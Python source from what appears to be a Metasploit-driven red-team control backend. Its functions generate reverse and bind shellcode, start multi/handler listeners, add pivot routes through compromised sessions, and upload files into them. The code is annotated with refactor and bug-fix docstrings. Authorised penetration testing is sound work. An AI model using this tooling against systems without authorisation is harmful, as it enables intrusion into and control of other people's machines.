    def create(sessionid=None, filename=None, dirpath=None, operation=None):
        """Run a file-system operation inside a Metasploit session.

        Dispatches on ``operation``:

        * ``'create_dir'`` (requires ``sessionid`` and ``dirpath``): runs the
          ``multi/manage/file_system_operation_api`` post module with
          ``runasjob=False`` and a 12 s timeout, then parses its JSON reply.
          No reply -> code 301; unparsable reply -> 302; ``status`` not
          ``True`` -> 303; otherwise 201 carrying the module's ``data``.
        * ``'upload_file'`` (requires ``sessionid``, ``filename`` and
          ``dirpath``): runs the same module with ``runasjob=True`` and
          ``MSF_FILE`` set to ``filename``. The result is returned as-is
          under 201 (it is not parsed here), or 301 when it is ``None``.

        Any other combination of arguments yields code 306.

        ``dirpath`` is normalised by ``FileSession.deal_path`` before it is
        sent; ``filename`` is forwarded unchanged as ``MSF_FILE``.
        NOTE(review): nothing in this method restricts ``filename`` to the
        intended upload directory — confirm that the module (or the caller)
        enforces that before treating this as safe for user-supplied names.

        Returns the ``data_return`` context dict.
        """
        module = 'multi/manage/file_system_operation_api'

        if operation == 'create_dir' and sessionid is not None and dirpath is not None:
            opts = {
                'OPERATION': 'create_dir',
                'SESSION': sessionid,
                'SESSION_DIR': FileSession.deal_path(dirpath),
            }
            raw = MSFModule.run('post', module, opts, runasjob=False, timeout=12)
            if raw is None:
                return data_return(301, FileSession_MSG.get(301), [])
            try:
                reply = json.loads(raw)
            except Exception as E:
                logger.warning(E)
                return data_return(302, FileSession_MSG.get(302), {})
            if reply.get('status') is not True:
                return data_return(303, FileSession_MSG.get(303), [])
            return data_return(201, FileSession_MSG.get(201), reply.get('data'))

        if operation == 'upload_file' and sessionid is not None and filename is not None and dirpath is not None:
            opts = {
                'OPERATION': 'upload',
                'SESSION': sessionid,
                'SESSION_DIR': FileSession.deal_path(dirpath),
                'MSF_FILE': filename,
            }
            raw = MSFModule.run('post', module, opts, runasjob=True, timeout=12)
            if raw is None:
                return data_return(301, FileSession_MSG.get(301), {})
            return data_return(201, FileSession_MSG.get(201), raw)

        return data_return(306, FileSession_MSG.get(306), [])
    def destory(subnet=None, netmask=None, sessionid=None):
        """Delete the pivot route ``subnet``/``netmask`` that goes via ``sessionid``.

        Runs the ``multi/manage/routeapi`` post module with ``CMD='delete'``.
        Outcome mapping: no reply -> 505 (message from ``CODE_MSG``); reply
        that is not valid JSON -> 306; ``status`` is ``True`` -> 204 plus an
        info notice; any other status -> 304.

        All three arguments are forwarded to the module unchanged; no format
        validation of subnet/netmask happens here.

        Returns the ``data_return`` context dict.
        """
        raw = MSFModule.run(
            module_type="post",
            mname="multi/manage/routeapi",
            opts={
                'CMD': 'delete',
                'SUBNET': subnet,
                'NETMASK': netmask,
                'SESSION': sessionid,
            },
        )
        if raw is None:
            return data_return(505, CODE_MSG.get(505), [])

        try:
            reply = json.loads(raw)
        except Exception as E:
            logger.warning(E)
            return data_return(306, Route_MSG.get(306), {})

        if reply.get('status') is not True:
            return data_return(304, Route_MSG.get(304), {})

        Notice.send_info(f"删除路由,SID:{sessionid} {subnet}/{netmask}")
        return data_return(204, Route_MSG.get(204), {})
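    def generate_shellcode(mname=None, opts=None):
        """Generate a payload with Metasploit and return its raw bytes.

        ``opts`` is normalised *in place* (the caller's dict is mutated, as
        before) and then passed to the ``payload`` module ``mname``:

        * reverse payloads drop ``RHOST``; bind payloads drop ``LHOST``
          (``reverse`` is tested first, as in the original dispatch);
        * ``OverrideRequestHost`` ``True`` replaces ``LHOST``/``LPORT`` with
          ``OverrideLHOST``/``OverrideLPORT`` and emits warning notices;
        * for ``meterpreter_*`` payloads ``EXTENSIONS`` ``True`` becomes
          ``'stdapi'``;
        * ``Format`` is derived from the platform token in ``mname``:
          ``jar`` for java, ``py`` for python, ``raw`` otherwise.

        Returns the base64-decoded payload bytes, or ``None`` when the module
        returned nothing or its result carries no ``payload`` field.

        Raises ``KeyError`` when ``OverrideRequestHost`` is set but
        ``OverrideLHOST``/``OverrideLPORT`` are missing.

        Fixes: the reverse/bind detection used ``str.find(...) > 0``, which
        is ``False`` for a match at index 0 and silently kept the wrong host
        option; ``in`` is used instead. ``None`` ``opts`` no longer crashes.
        """
        if opts is None:
            opts = {}

        if "reverse" in mname:
            opts.pop('RHOST', None)
        elif "bind" in mname:
            opts.pop('LHOST', None)

        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(
                f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(
                f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        # First platform token found wins; order mirrors the original elif chain.
        format_by_platform = (
            ("windows", 'raw'),
            ("linux", 'raw'),
            ("java", 'jar'),
            ("python", 'py'),
            ("php", 'raw'),
        )
        opts["Format"] = next(
            (fmt for platform, fmt in format_by_platform if platform in mname),
            'raw',
        )

        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return None
        encoded = result.get('payload')
        if encoded is None:
            # Previously this fed None into b64decode and raised TypeError.
            return None
        return base64.b64decode(encoded)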
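    def _get_info(self, info_part):
        """Fetch one section of session info via ``multi/gather/base_info``.

        ``info_part`` is forwarded as the module's ``INFO_PART`` option and
        ``self.sessionid`` as ``SESSION``.

        Returns the module's ``data`` when the JSON reply reports a truthy
        ``status``; otherwise ``None``. ``None`` is also returned, without
        running the module, when ``self.sessionid`` is ``None`` or ``<= 0``,
        and when the module gives no reply or a reply that is not a JSON
        object (the parse error is logged at warning level).

        Fix: the session-id guard was duplicated (``is None`` was tested
        twice, the second time together with ``<= 0``); a single guard now
        runs before the options dict is built.
        """
        sessionid = self.sessionid
        if sessionid is None or sessionid <= 0:
            return None

        raw = MSFModule.run(
            module_type="post",
            mname="multi/gather/base_info",
            opts={'SESSION': sessionid, 'INFO_PART': info_part},
        )
        if raw is None:
            return None

        try:
            reply = json.loads(raw)
        except (TypeError, ValueError) as E:
            logger.warning(E)
            return None
        # A non-object JSON reply used to surface as an AttributeError that
        # the broad except swallowed; make that case explicit.
        if not isinstance(reply, dict) or not reply.get('status'):
            return None
        return reply.get('data')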
    def create(subnet=None, netmask=None, sessionid=None, autoroute=None):
        """Add a pivot route through ``sessionid``.

        When ``autoroute`` is exactly ``True`` the ``multi/manage/routeapi``
        post module is asked to ``autoadd`` routes for the session and
        ``subnet``/``netmask`` are ignored; otherwise a single ``add`` of
        ``subnet``/``netmask`` is requested. Inputs are forwarded unvalidated.

        Outcome mapping: no reply -> 505 (``CODE_MSG``); non-JSON reply ->
        306; ``status`` ``True`` with a list ``data`` -> 201 carrying that
        list plus a success notice; any other reply -> 305.

        Returns the ``data_return`` context dict.
        """
        if autoroute is True:
            opts = {'CMD': 'autoadd', 'SESSION': sessionid}
        else:
            opts = {
                'CMD': 'add',
                'SUBNET': subnet,
                'NETMASK': netmask,
                'SESSION': sessionid
            }

        raw = MSFModule.run(module_type="post",
                            mname="multi/manage/routeapi",
                            opts=opts)
        if raw is None:
            return data_return(505, CODE_MSG.get(505), [])

        try:
            reply = json.loads(raw)
        except Exception as E:
            logger.warning(E)
            return data_return(306, Route_MSG.get(306), [])

        if reply.get('status') is not True or not isinstance(reply.get('data'), list):
            return data_return(305, Route_MSG.get(305), [])

        # The notice text keys on truthiness of ``autoroute`` (not identity),
        # exactly as before.
        if autoroute:
            Notice.send_success(f"新增路由,SID:{sessionid} 自动模式")
        else:
            Notice.send_success(
                f"新增路由,SID:{sessionid} {subnet}/{netmask}")
        return data_return(201, Route_MSG.get(201), reply.get('data'))
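    def create(opts=None):
        """Start a ``multi/handler`` listener (or a virtual one) from ``opts``.

        ``opts`` holds Metasploit option names in upper case (e.g.
        ``PAYLOAD``, ``LHOST``, ``LPORT``, ``RHOST``); the dict is modified in
        place and echoed back in the returned context.

        * ``VIRTUALHANDLER`` ``True``: the key is removed and
          ``Handler.create_virtual_handler`` is called; ``None`` -> 301 with
          ``opts`` (``ID`` set to ``None``), otherwise 201 with ``{}``.
        * Otherwise a real job: ``proxies_proto``/``proxies_ipport`` are
          folded into ``proxies`` (dropped for ``Direct`` or absent),
          ``RHOST`` is removed for reverse payloads and ``LHOST`` for bind
          payloads, ``EXITONSESSION`` is forced ``False`` (with
          ``KillHandlerFouce`` ``True``) for ``reverse_http``/
          ``reverse_winhttp`` payloads and coerced to a bool for all others,
          a fresh ``PayloadUUIDSeed`` is set, and ``exploit/multi/handler``
          is launched with ``runasjob=True``. 201 with ``opts['ID']`` = job
          id when the job is alive, 301 otherwise.

        A missing/non-string ``PAYLOAD`` or any other error while preparing
        the options yields 500.

        Fixes versus the previous version: the reverse-http test was
        ``payload.find("reverse_http") or payload.find("reverse_winhttp")``;
        ``find`` returns -1 (truthy) on no match, so the branch fired for
        every payload, ``EXITONSESSION`` was always forced ``False`` and the
        user's setting was never honoured. ``PayloadUUIDSeed`` now comes from
        ``uuid4``: ``uuid1`` embeds the host MAC address and a timestamp,
        which leaks host identity into every payload and is predictable.
        A non-numeric ``job_id`` no longer escapes as an uncaught exception.

        Returns the ``data_return`` context dict.
        """
        if opts is None:
            opts = {}

        def _fold_proxy_opts(options):
            """Collapse proxies_proto/proxies_ipport into a single ``proxies`` option."""
            proto = options.pop('proxies_proto', None)
            ipport = options.pop('proxies_ipport', None)
            if proto is not None and proto != "Direct":
                options["proxies"] = f"{proto}:{ipport}"

        def _apply_payload_opts(options):
            """Payload-type specific fix-ups; raises TypeError on a bad PAYLOAD."""
            payload = options.get('PAYLOAD')
            if not isinstance(payload, str):
                raise TypeError("PAYLOAD option must be a string")
            if "reverse" in payload:
                options.pop('RHOST', None)
            elif "bind" in payload:
                if options.get('LHOST') is not None:
                    options.pop('LHOST')
            if "reverse_http" in payload or "reverse_winhttp" in payload:
                # Reverse http(s) handlers must stay resident for stagers.
                options['EXITONSESSION'] = False
                options['KillHandlerFouce'] = True
            else:
                options['EXITONSESSION'] = bool(options.get('EXITONSESSION'))
            options['PayloadUUIDSeed'] = str(uuid.uuid4())

        if opts.get('VIRTUALHANDLER') is True:
            opts.pop('VIRTUALHANDLER')
            if Handler.create_virtual_handler(opts) is None:
                opts['ID'] = None
                return data_return(301, Handler_MSG.get(301), opts)
            return data_return(201, Handler_MSG.get(201), {})

        try:
            _fold_proxy_opts(opts)
            _apply_payload_opts(opts)
        except Exception as E:
            logger.error(E)
            return data_return(500, CODE_MSG.get(500), {})

        result = MSFModule.run(module_type="exploit", mname="multi/handler", opts=opts, runasjob=True)
        if not isinstance(result, dict) or result.get('job_id') is None:
            opts['ID'] = None
            return data_return(301, Handler_MSG.get(301), opts)

        try:
            job_id = int(result.get('job_id'))
        except (TypeError, ValueError) as E:
            logger.error(E)
            opts['ID'] = None
            return data_return(301, Handler_MSG.get(301), opts)

        if not Job.is_msf_job_alive(job_id):
            return data_return(301, Handler_MSG.get(301), opts)

        opts['ID'] = job_id
        Notice.send_success("新建监听成功:{} {} JobID:{}".format(opts.get('PAYLOAD'), opts.get('LPORT'),
                                                           result.get('job_id')))
        return data_return(201, Handler_MSG.get(201), opts)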